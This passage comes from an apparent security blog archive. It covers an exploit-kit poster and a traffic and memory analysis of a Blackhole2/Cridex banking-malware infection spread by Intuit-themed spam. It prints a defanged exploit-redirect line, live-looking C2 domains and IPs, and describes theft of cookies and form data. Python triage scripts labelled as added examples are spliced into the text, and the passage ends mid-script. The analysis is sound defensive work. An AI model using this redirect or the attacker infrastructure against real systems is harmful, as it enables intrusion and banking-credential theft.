<tr><td>Norman</td><td>Kelihos.DA</td><td>20130206</td></tr>
<tr><td>Panda</td><td>Suspicious file</td><td>20130206</td></tr>
<tr><td>VBA32</td><td>SScope.Trojan.SB.01722</td><td>20130206</td></tr>
<tr><td>VIPRE</td><td>Trojan.Win32.Generic!BT</td><td>20130206</td></tr>
</tbody></table>
</div>
Mila Parkour, 2012-11-11 (updated 2013-05-17): <b>Common Exploit Kits 2012 Poster</b><div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="-webkit-box-shadow: rgba(0, 0, 0, 0) 1px 1px 5px; background-color: white; border: 1px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0) 1px 1px 5px; color: #222222; float: left; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19px; margin-right: 1em; padding: 0px; position: relative; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUj-dn7N4vmJVNX2cpcYS4MsR06cFXihi5dpLyr_mM_dEp1eNiH0ZaXX9AlADTRmTw1jGlu1IHhHcA3cAw6cDwqrr09ggzVTt8oRXclHn74Bi5yDlP-AisgsiiFnhrDLQ928DQqlPzeeY/s1600/sandy.JPG" imageanchor="1" style="clear: left; color: #660000; margin-bottom: 1em; margin-left: auto; margin-right: auto; text-decoration: initial;"><img border="0" height="139" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUj-dn7N4vmJVNX2cpcYS4MsR06cFXihi5dpLyr_mM_dEp1eNiH0ZaXX9AlADTRmTw1jGlu1IHhHcA3cAw6cDwqrr09ggzVTt8oRXclHn74Bi5yDlP-AisgsiiFnhrDLQ928DQqlPzeeY/s200/sandy.JPG" style="-webkit-box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px; background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: none; box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px; padding: 0px; position: relative;" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="font-size: 11px; text-align: center;">Hurricane Sandy, Jersey Shore<br />
<span style="font-size: xx-small;">Src. Twitter Oct 28,2012<br /> author unknown</span></td></tr>
</tbody></table>
<div style="text-align: center;">
<span style="color: #f1c232;"><b>Update May 2013: download any size of the 2012 poster, now for <u>free</u>, here:</b></span></div>
<span style="color: #f1c232;"><b><br /></b></span>
<br />
<div>
<div style="text-align: center;">
<a href="http://www.mediafire.com/?bmbvuqbuzy1x78v">8900 x 6000 px = up to 40" x 60" (101 x 150 cm) </a></div>
<div style="text-align: center;">
<a href="http://www.mediafire.com/view/?8g69j3ykd5dpviz">5340 x 3600 px = up to 24" x 35.6" (~ 61 x 91 cm) </a></div>
<div style="text-align: center;">
<a href="http://www.mediafire.com/view/?8g69j3ykd5dpviz">3578 x 2415 px = up to 16" x 24" (~ 40 x 60 cm) </a></div>
<div style="text-align: center;">
<a href="http://www.mediafire.com/file/p7dxpsvm77l47s4/1780x1200_CommonExploitPacks2012u18.zip">1720 x 1200 px = up to 11"x14" (~ 20 x 30 cm) </a><b></b></div>
</div>
<div>
<br /></div>
<div>
For current information and a table listing of exploit packs, please visit </div>
<div>
<br /></div>
<div style="text-align: left;">
<div style="text-align: center;">
<b><a href="http://contagiodump.blogspot.com/2010/06/overview-of-exploit-packs-update.html">Contagio: Overview of exploit packs</a></b></div>
</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div>
-----------------------------------------------------------------------------------------<br />
The poster includes the most common exploit packs of 2012. It will be updated, and new issues will be posted in the future.<br />
<br />
<div style="text-align: center;">
See Staten Island hurricane aftermath photos here:</div>
<div style="text-align: center;">
<a href="http://lightbox.time.com/2012/11/08/sandys-aftermath-devastation-in-staten-island-by-eugene-richards/#1">Time.com</a> <a href="http://www.nytimes.com/slideshow/2012/11/10/nyregion/StatenIsland-ss.html#1">NY Times</a></div>
If you wish to use your own printing service and/or need multiple copies, you can request the poster file (JPG, 8900 x 6000 px, printable to at least 60"x40" or 152cm x 101cm) in exchange for a <a href="http://www.silive.com/news/index.ssf/2012/11/donate_to_help_staten_island_r.html">$25 minimum donation to the Hurricane Relief or a charity of your choice</a>. Email us (admin at deependresearch.org) a receipt or proof of a donation made in the past month (you can partially hide/obscure your personal info, if needed) and we will email you the file.<br />
<br />
<br />
You can request the poster file (see sizes below) in exchange for a donation to the Hurricane Relief or a charity of your choice. Email us (admin at deependresearch.org) a receipt of a donation made in the past month (you can partially hide/obscure your personal info, if needed) and we will send you the file.<br />
8900 x 6000 px = up to 40" x 60" (101 x 150 cm) = $25 <b><a href="http://www.silive.com/news/index.ssf/2012/11/donate_to_help_staten_island_r.html">Donate here</a></b> or charity of your choice<br />
5340 x 3600 px = up to 24" x 35.6" (~ 61 x 91 cm) = $15 <a href="http://www.silive.com/news/index.ssf/2012/11/donate_to_help_staten_island_r.html"><b>Donate here</b></a> or charity of your choice<br />
3578 x 2415 px = up to 16" x 24" (~ 40 x 60 cm) = $10 <a href="http://www.silive.com/news/index.ssf/2012/11/donate_to_help_staten_island_r.html"><b>Donate here</b></a> or charity of your choice<br />
1720 x 1200 px = up to 11"x14" (~ 20 x 30 cm) = <b><a href="http://www.mediafire.com/file/p7dxpsvm77l47s4/1780x1200_CommonExploitPacks2012u18.zip">Free Download</a></b><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5qmqD91aAi4flX9HqSlI9Ee6U6FL-45Us1PXX2n_k4JKxjlB1HOUS43UOo9DTAyO_DURa4KgHJajM7zA7510QSux0IXfN1x9Xf0bc81xV7NWqCrCUZuDWvwiD1mrfH0cRfM4ExJIWkJg/s1600/1780x1200_CommonExploitPacks2012u18.jpg" imageanchor="1" style="color: #660000; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19px; margin-left: 1em; margin-right: 1em; text-align: center; text-decoration: initial;"><img border="0" height="430" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5qmqD91aAi4flX9HqSlI9Ee6U6FL-45Us1PXX2n_k4JKxjlB1HOUS43UOo9DTAyO_DURa4KgHJajM7zA7510QSux0IXfN1x9Xf0bc81xV7NWqCrCUZuDWvwiD1mrfH0cRfM4ExJIWkJg/s640/1780x1200_CommonExploitPacks2012u18.jpg" style="-webkit-box-shadow: rgba(0, 0, 0, 0) 1px 1px 5px; border: 1px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0) 1px 1px 5px; padding: 0px; position: relative;" width="640" /></a></div>
<br />
<br />
<br />
<br />
<a name='more'></a><b>Copyright information:</b><br />
All logos in the images of the fish are trademarks of Adobe Systems, Sun Microsystems, Apple, and Microsoft. The logos are used only for product comparison and academic research reasons that fall within "Fair use" and "Nominative Fair use" limits. If these companies have any concerns, their representatives can contact us via email.<br />
See more here:<br />
<a href="http://en.wikipedia.org/wiki/Nominative_use">http://en.wikipedia.org/wiki/Nominative_use</a><br />
<a href="http://en.wikipedia.org/wiki/Fair_use">http://en.wikipedia.org/wiki/Fair_use</a><br />
<br />
</div>
</div>
Mila Parkour, 2012-10-04: <b>Blackhole & Cridex: Season 2 Episode 1: Intuit Spam & SSL traffic analysis</b><br />
The other day, I received another spam email, this time supposedly from Intuit. Since I know that Blackhole2 is now directing to Bugat/Feodo/Cridex banking malware, I wanted to look more closely and see what might be new. The "Intuit" email looked like this, and its text is shown below:<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3qh-qh_YYTijo-UMxLOGWb07EDsCcCJE6mMn2hkl9jTV12GyAX66F0xnt9BmTOritJaff6MsmWVKdHIW_iI4ruaXZ9U7SLuOuJo_Gkor0FGgFC5XQ0RuSf16JOa_vjG3GFRGShvNOPoZk/s1600/email.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3qh-qh_YYTijo-UMxLOGWb07EDsCcCJE6mMn2hkl9jTV12GyAX66F0xnt9BmTOritJaff6MsmWVKdHIW_iI4ruaXZ9U7SLuOuJo_Gkor0FGgFC5XQ0RuSf16JOa_vjG3GFRGShvNOPoZk/s400/email.png" width="230" /></a><br />
<span style="font-family: Times, 'Times New Roman', serif;">Dear xxxxxxx,</span><br />
<blockquote class="tr_bq">
<span style="font-family: Times, Times New Roman, serif;"></span></blockquote>
<span style="font-family: Times, 'Times New Roman', serif;"> Great News! Your order, QG673260, was shipped today (see details below) and will complete shortly. We hope that you will see that it suit your needs. If you requested multiple products, we may ship them in separate boxes (at no additional cost to you) to ensure the fastest possible delivery. </span><br />
<blockquote class="tr_bq">
<span style="font-family: Times, Times New Roman, serif;">We will also inform you with the ability to track your parcels via the instructions below.</span></blockquote>
<span style="font-family: Times, 'Times New Roman', serif;">Thank you for your order.</span><br />
<blockquote class="tr_bq">
<span style="font-family: Times, Times New Roman, serif;">ORDER DETAILS<br />Order #: QG673260<br />Order Date: Sep 25, 2012</span></blockquote>
<span style="font-family: Times, 'Times New Roman', serif;">Item(s) Requested In Your Shipment</span><br />
<blockquote class="tr_bq">
<span style="font-family: Times, 'Times New Roman', serif;">Shipping Date: October, 1 2012<br />Ship Method: TNT<br />
Estimated Delivery Date: October, 3 2012 - October 05, 2012</span></blockquote>
<blockquote class="tr_bq">
<span style="font-family: Times, Times New Roman, serif;">Tracking No.: 8178101777788272988726</span></blockquote>
<br />
<br />
<br />
The prolific Cutwail spambot sent the spam email with a lure URL of:<br />
<div style="text-align: center;">
<span style="color: orange;"><span style="font-family: inherit;">hx</span><span style="font-family: inherit;">xp://ladavaz.info/components/com_ag_google_analytics2/croconfrm.html</span></span></div>
<br />
This URL path construction has been used as a redirector to Blackhole exploit sites carried by the popular LinkedIn spam runs, as well as others. For example the following URLs have been used by Blackhole:<br />
<br />
<div style="text-align: left;">
<i>/components/com_ag_google_analytics2/croconfrm.html</i></div>
<div style="text-align: left;">
<i>/components/com_ag_google_analytics2/fdicsecup.html</i></div>
<div style="text-align: left;">
<i>/components/com_ag_google_analytics2/itordernote.html</i></div>
<div style="text-align: left;">
<i>/components/com_ag_google_analytics2/Link.html</i></div>
<div style="text-align: left;">
<i>/components/com_ag_google_analytics2/supreqfdic.html</i></div>
<br />
My downloaded "croconfrm.html" contained the following:<br />
<div style="text-align: center;">
<i><span style="color: orange;">&lt;/script&gt;&lt;noscript&gt;&lt;meta http-equiv="refresh" content="0; url=hxxp://art-london.net/detects/stones-instruction_think.php"&gt;&lt;/noscript&gt;</span></i></div>
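A lure page of this shape can be triaged automatically: pull the meta-refresh target out of the noscript fallback and check whether the lure URL matches the redirector path pattern listed above. The following is an added example, not code from the original post; SAMPLE_HTML is a constructed page in the shape of the croconfrm.html excerpt, and the hostnames are placeholders.

```python
"""Extract redirect targets from a Blackhole-style lure page and match lure
URLs against the /components/com_ag_google_analytics2/*.html pattern.

Added example, not from the original post. The sample page and hostnames are
constructed; 'hxxp' is kept as a defanged scheme, as in the post.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Redirector path pattern seen in the lure URLs listed above
LURE_PATH_RE = re.compile(r"^/components/com_ag_google_analytics2/[A-Za-z0-9_.-]+\.html$")
# <meta http-equiv="refresh" content="0; url=..."> content attribute
REFRESH_RE = re.compile(r"^\s*\d+\s*;\s*url\s*=\s*(?P<url>\S+)\s*$", re.IGNORECASE)

# Constructed lure page: script for JS-enabled clients, meta refresh for the rest
SAMPLE_HTML = """<html><body>
<script type="text/javascript">var go = 1;</script>
<noscript><meta http-equiv="refresh" content="0; url=hxxp://exploit.example/detects/landing.php"></noscript>
</body></html>"""


def is_lure_path(url):
    """True when the URL path matches the redirector pattern."""
    return bool(LURE_PATH_RE.match(urlparse(url).path))


class RefreshFinder(HTMLParser):
    """Collect meta-refresh targets and whether each sits inside <noscript>."""

    def __init__(self):
        super().__init__()
        self.in_noscript = 0
        self.targets = []  # (url, inside_noscript)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "noscript":
            self.in_noscript += 1
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = REFRESH_RE.match(a.get("content") or "")
            if m:
                self.targets.append((m.group("url"), self.in_noscript > 0))

    def handle_endtag(self, tag):
        if tag == "noscript" and self.in_noscript:
            self.in_noscript -= 1


def redirect_targets(html):
    """Return [(url, inside_noscript), ...] for every meta refresh on the page."""
    p = RefreshFinder()
    p.feed(html)
    p.close()
    return p.targets


def triage_lure(url, html):
    """Combine the URL-pattern and hidden-redirect signals for one fetched page."""
    targets = redirect_targets(html)
    return {
        "lure_path": is_lure_path(url),
        "noscript_redirects": [u for u, hidden in targets if hidden],
        "all_redirects": [u for u, _ in targets],
    }


if __name__ == "__main__":
    lure = "hxxp://lure.example/components/com_ag_google_analytics2/croconfrm.html"
    print(triage_lure(lure, SAMPLE_HTML))
```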
<br />
<span style="font-family: inherit;">Note: if you simply wget the PHP file from a Blackhole2 kit, you will most likely get back a harmless dummy file. BH2 requires a Referer header and serves only one request per IP address. In this case, a plain fetch of the PHP yielded this:</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_guV4AXsAlYH84rsBK8-xzwaZ_izlfbXMWiWulEhQU7SrMTHXIXFRH2l09NkuT-hxh97m7zip-JOk1m4FJZ7hSqpSV1iwmnErlQ9-QSyBynXEEqPS0YrHuJbE-ehDL9yGFXQyDYzxw__J/s1600/wget.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_guV4AXsAlYH84rsBK8-xzwaZ_izlfbXMWiWulEhQU7SrMTHXIXFRH2l09NkuT-hxh97m7zip-JOk1m4FJZ7hSqpSV1iwmnErlQ9-QSyBynXEEqPS0YrHuJbE-ehDL9yGFXQyDYzxw__J/s640/wget.jpg" width="640" /></a></div>
<span style="font-family: inherit;"><br />
</span> <span style="font-family: inherit;">Note the difference when the link is followed via a fresh IP address, and tracked via an intercepting proxy:</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEqVm05KrUrDso1ozz4MVkk4H5faZhJLLxYPGXZrRZLw0OpX8RZw7vdqMro4qk3Gd5VgH0FQc0QmBLEOOzb1vLY97rrMUYdb5F_3INyeYTQ6hBPzHtxvuxrgn40Wrnb7Tlvm-KlaI6RaDe/s1600/wget1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEqVm05KrUrDso1ozz4MVkk4H5faZhJLLxYPGXZrRZLw0OpX8RZw7vdqMro4qk3Gd5VgH0FQc0QmBLEOOzb1vLY97rrMUYdb5F_3INyeYTQ6hBPzHtxvuxrgn40Wrnb7Tlvm-KlaI6RaDe/s640/wget1.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: inherit;"><br />
</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: inherit;">I'll make this file available for download at the bottom of the post and leave the decoding as an exercise for the reader. In the meantime, the BH2 kit served up two exploits for me. The first was a PDF file with an </span>MD5 hash <span style="font-family: inherit;">of </span>2d0932026e5a4791ed6fac44df22f91c and <a href="https://www.vicheck.ca/md5query.php?hash=2d0932026e5a4791ed6fac44df22f91c" style="font-family: inherit;">vicheck.ca report seen here</a><span style="font-family: inherit;">. </span> The second file was a PE32 executable with MD5 hash value of 06c6544f554ea892e86b6c2cb6a1700c and the <a href="https://www.virustotal.com/file/ee305b8e80ca0e06147909080435a9eec04532d3054e76102dd6750ef132d907/analysis/">VirusTotal report here</a>.</div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: inherit;"></span><br /></div>
<span style="font-family: inherit;">
</span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaQ_qOii28iSYUjeb7y5EMGZQ9D5gbZ86b1VcInz4nWR3DFFYXdVyM77hEwbMEjlp7bDmJ-98d0nQC46lpfCp9zSRH_wBu1KUfB2lGHma2gxtvmtttxEuEHYcymX4bK1ijMeQn_QYLFM8d/s1600/download_pdf.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaQ_qOii28iSYUjeb7y5EMGZQ9D5gbZ86b1VcInz4nWR3DFFYXdVyM77hEwbMEjlp7bDmJ-98d0nQC46lpfCp9zSRH_wBu1KUfB2lGHma2gxtvmtttxEuEHYcymX4bK1ijMeQn_QYLFM8d/s320/download_pdf.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">PDF file dropped from 'art-london.net'</td></tr>
</tbody></table>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="clear: right; float: right; margin-bottom: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHdK4fMZfO5PVnAxzvkNray2iN5T_Zn_KqaRqepSUiUjzOrH1ydMNRnxElinU9tNtydIKvQUESpfH1_RvPOyU5WiXZvxGBtyPjCZt8Ycys8T8pd7uluI4zkXrnwKfE7DEJVaX7HpdZbcHf/s1600/download_exe.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="166" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHdK4fMZfO5PVnAxzvkNray2iN5T_Zn_KqaRqepSUiUjzOrH1ydMNRnxElinU9tNtydIKvQUESpfH1_RvPOyU5WiXZvxGBtyPjCZt8Ycys8T8pd7uluI4zkXrnwKfE7DEJVaX7HpdZbcHf/s320/download_exe.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">executable file dropped from 'art-london.net'</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<span style="font-family: inherit;">Once my test system became infected, it did a DNS query for </span><b style="font-family: inherit;"><span style="color: orange;">droppinleverpro.ru</span></b><span style="font-family: inherit;">, which was offline. It then queried for </span><b style="font-family: inherit;"><span style="color: orange;">tuningferrarisglamour.ru</span></b><span style="font-family: inherit;">, which successfully resolved to </span><b style="font-family: inherit;"><span style="color: orange;">146.185.220.176</span></b><span style="font-family: inherit;">.</span><br />
<br />
<span style="font-family: inherit;">At that point, my infected host established an HTTPS connection with: <b>hxxps://tuningferrarisglamour.ru/savestats/</b></span><br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioLmXdccSNlojr-9ne-eRrXMIT7NdMy8ax9BYg3LcKs7jglmIqNfpZ9FHtEKU5V1_oXiF44D6nuMYrPYARJK0h8f667ek40mC7SoLfOb7OuglRnSUUSfTH4YDBMHVubt42Gf3j7oHpn09q/s1600/dns_query.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioLmXdccSNlojr-9ne-eRrXMIT7NdMy8ax9BYg3LcKs7jglmIqNfpZ9FHtEKU5V1_oXiF44D6nuMYrPYARJK0h8f667ek40mC7SoLfOb7OuglRnSUUSfTH4YDBMHVubt42Gf3j7oHpn09q/s400/dns_query.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">DNS queries and beginning of SSL session.</td></tr>
</tbody></table>
Examining the traffic via Wireshark or similar will yield no joy, as the traffic is SSL encrypted. However, by using an intercepting proxy as I described in my post <a href="http://sempersecurus.blogspot.com/2011/12/decoding-malware-ssl-using-burp-proxy.html">"Decoding malware SSL using Burp proxy"</a>, I was able to examine the traffic between my infected host and <b><span style="color: orange;">tuningferrarisglamour.ru</span></b>. The first response from the server was very interesting, as it contained a large number of references to financial institutions and login URLs, as well as injection code. This is a much larger list than I saw in <a href="http://sempersecurus.blogspot.com/2012/08/cridex-analysis-using-volatility.html">my last Cridex analysis</a>, plus the injection code was very comprehensive and again covered a large number of institutions. A snippet of the decoded SSL session is seen below:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2-m-EWwru7-vEbSr2TZUazPKjsDwBJYpsVjRfuM4FaGjsUpxR8NrrzoHHxfHlRMm1lcbP1qRpdxNfw4IMZdlinSV64tsHi70U0doMWaTQHbr1lP8mH1fvpNVgW7lSg0XlsbcdVSbqCq0G/s1600/response_1.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="438" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2-m-EWwru7-vEbSr2TZUazPKjsDwBJYpsVjRfuM4FaGjsUpxR8NrrzoHHxfHlRMm1lcbP1qRpdxNfw4IMZdlinSV64tsHi70U0doMWaTQHbr1lP8mH1fvpNVgW7lSg0XlsbcdVSbqCq0G/s640/response_1.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">SSL Server response</td></tr>
</tbody></table>
There were several additional POST requests to <b><span style="color: orange;">tuningferrarisglamour.ru</span></b> where it appears that my host's process lists, cookies, bookmarks, form history, and shared objects were sent to the remote server.<br />
<br />
A snippet of this decoded traffic is seen below:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7-le2Cm-DCKI4u-5FNxEQHr0AWY4OswWMSbWz2SXKSMRDLN-wRwxTK4hyphenhyphen3csYq6hvIlolMZ8Svb-X6P_EW-v9t1YVrw2VFo1JB37DWQl3_99aNvYftF2AvlkZpGGVgw0Rvjr_UvkbDnir/s1600/response_2.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7-le2Cm-DCKI4u-5FNxEQHr0AWY4OswWMSbWz2SXKSMRDLN-wRwxTK4hyphenhyphen3csYq6hvIlolMZ8Svb-X6P_EW-v9t1YVrw2VFo1JB37DWQl3_99aNvYftF2AvlkZpGGVgw0Rvjr_UvkbDnir/s640/response_2.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">SSL Traffic indicating POST of shared objects</td></tr>
</tbody></table>
At this point, a message window popped up on the host asking if "I was sure I wanted to navigate away from this page". Selecting "Yes" took me to legitimate Google.com.<br />
<br />
<h3>
<u><span style="font-size: large;">Volatility</span></u></h3>
I suspended my infected virtual machine soon after the SSL traffic to <b><span style="color: orange;">tuningferrarisglamour.ru</span></b> appeared to pause and decided to see what some quick Volatility analysis would yield.<br />
<br />
Running <a href="http://code.google.com/p/volatility/wiki/CommandReference22#psscan">'psscan'</a> against the suspended memory image yielded the output below:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5oZkjJ80VQc-QQ2xYn73hrDROVhImCMopS9pHaxbH09lS80XKUXpWoI-Tx-aJB8OIthaB-1czNO-A1ovBK0INnnHutLVOOYeotBWSMvyPtQw1_Nnr2hQgiJqKI5ZmYW3tqgSoin-iKNP_/s1600/psscan.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="347" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5oZkjJ80VQc-QQ2xYn73hrDROVhImCMopS9pHaxbH09lS80XKUXpWoI-Tx-aJB8OIthaB-1czNO-A1ovBK0INnnHutLVOOYeotBWSMvyPtQw1_Nnr2hQgiJqKI5ZmYW3tqgSoin-iKNP_/s640/psscan.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">'psscan' output</td></tr>
</tbody></table>
<div>
Note that there are several unusual processes, notably:<br />
<br />
PID 1100 - KB00647877.exe - Terminated<br />
PID 1800 - KB00647877.exe - Terminated<br />
PID 1472 - POS4C.tmp - Terminated<br />
PID 1220 - cmd.exe - Terminated</div>
<div>
<br />
While 'cmd.exe' is not typically considered an unusual process, note that the creation and exit times of this instance are identical, and that the parent ID of this process is 1472, "POS4C.tmp".<br />
Examining the network connections via 'connscan', we see the following:</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigomXNagXbWZP9JE1eEcYgVdKY2ISg-ElvpI__8v7H6_E1qqBt69Ilsm2WOZM_S64TsCQOnsqJP2fYZYzmg4CDEs6AKXuTlZGe80F61a-7EtI_xxGFM7-408QB3LSw_EHJDbOWxz3RJZLh/s1600/connscan.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigomXNagXbWZP9JE1eEcYgVdKY2ISg-ElvpI__8v7H6_E1qqBt69Ilsm2WOZM_S64TsCQOnsqJP2fYZYzmg4CDEs6AKXuTlZGe80F61a-7EtI_xxGFM7-408QB3LSw_EHJDbOWxz3RJZLh/s400/connscan.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Connections to remote hosts</td></tr>
</tbody></table>
<div>
Note that PID 1492, 'explorer.exe', showed an established connection to <b><span style="color: orange;">146.185.220.176</span></b>, which is what we noted earlier as being the IP address of tuningferrarisglamour.ru. PID 1492 also showed a connection to <b><span style="color: orange;">4.27.18.126</span></b>, which, courtesy of Internet Systems Consortium (ISC) Passive DNS, is seen to be associated with the following domain names:<br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">freestreams-cdn.alldigital.net.rncdn1.com</span><br />
<span style="font-family: Courier New, Courier, monospace;">bc01.ajnm.me.c.itmdb.net<br />
bc04.ajnm.me.c.itmdb.net<br />
bc05.ajnm.me.c.itmdb.net<br />
bc18.ajnm.me.c.itmdb.net<br />
bc19.ajnm.me.c.itmdb.net<br />
bc21.ajnm.me.c.itmdb.net<br />
blogs.aljazeera.com.c.itmdb.net<br />
l3.vip.g.xgslb.net<br />
www.nps.gov.c.footprint6.net<br />
www.usgs.gov.c.footprint6.net<br />
fp4.www.usgs.gov.c.footprint6.net</span><br />
<br />
I next dumped the VAD segments of PID 1492, 'explorer.exe', in order to examine anything associated with these domains and banking URLs. Running 'strings' on the dumped VAD segments and searching for 'tuningferrarisglamour.ru' allowed me to locate this string in "explorer.exe.2228418.0x00090000-0x0018ffff.dmp". I then ran 'strings' on that entire segment and was able to see the same banking URLs and injection scripts that I noted in the SSL stream.</div>
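To turn the 'psscan' and 'connscan' observations above into a repeatable check, here is an added triage script (example code, not the post's own) that parses simplified plugin output and flags the same indicators: identical create/exit timestamps, a process spawned by a .tmp executable, hotfix-style names, and connections to the C2 addresses named in this post. The sample rows are constructed to mirror the findings; the column layout is simplified (no Offset/PDB fields) and the timestamps are invented.

```python
"""Triage of Volatility 'psscan' / 'connscan' text output.

Added example, not code from the original post. Sample rows are constructed:
PIDs, names and C2 IPs follow the post, timestamps and local ports are made up.
"""
import re
from collections import namedtuple

Proc = namedtuple("Proc", "name pid ppid created exited")
Conn = namedtuple("Conn", "local remote pid")

# Constructed psscan-style rows: name, pid, ppid, created, exited (blank = running)
PSSCAN_SAMPLE = """\
System                 4     0  2012-10-01 14:01:02 UTC+0000
explorer.exe        1492  1440  2012-10-01 14:02:10 UTC+0000
svchost.exe         1056   668  2012-10-01 14:01:30 UTC+0000
KB00647877.exe      1100  1492  2012-10-01 15:10:05 UTC+0000  2012-10-01 15:10:07 UTC+0000
POS4C.tmp           1472  1100  2012-10-01 15:10:06 UTC+0000  2012-10-01 15:10:09 UTC+0000
cmd.exe             1220  1472  2012-10-01 15:10:08 UTC+0000  2012-10-01 15:10:08 UTC+0000
KB00647877.exe      1800  1472  2012-10-01 15:10:08 UTC+0000  2012-10-01 15:10:20 UTC+0000
"""

# Constructed connscan-style rows: local address, remote address, owning pid
CONNSCAN_SAMPLE = """\
192.168.1.50:1043   146.185.220.176:443   1492
192.168.1.50:1044   4.27.18.126:80        1492
192.168.1.50:1045   74.125.225.100:443    1492
"""

TIMESTAMP = r"\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} \S+"
PS_ROW = re.compile(
    rf"^(?P<name>\S+)\s+(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<created>{TIMESTAMP})"
    rf"(?:\s+(?P<exited>{TIMESTAMP}))?\s*$"
)
CONN_ROW = re.compile(r"^(?P<local>[\d.]+:\d+)\s+(?P<remote>[\d.]+:\d+)\s+(?P<pid>\d+)\s*$")
HOTFIX_STYLE = re.compile(r"^KB\d{6,8}\.exe$", re.IGNORECASE)

# C2 addresses the post ties to tuningferrarisglamour.ru and droppinleverpro.ru.
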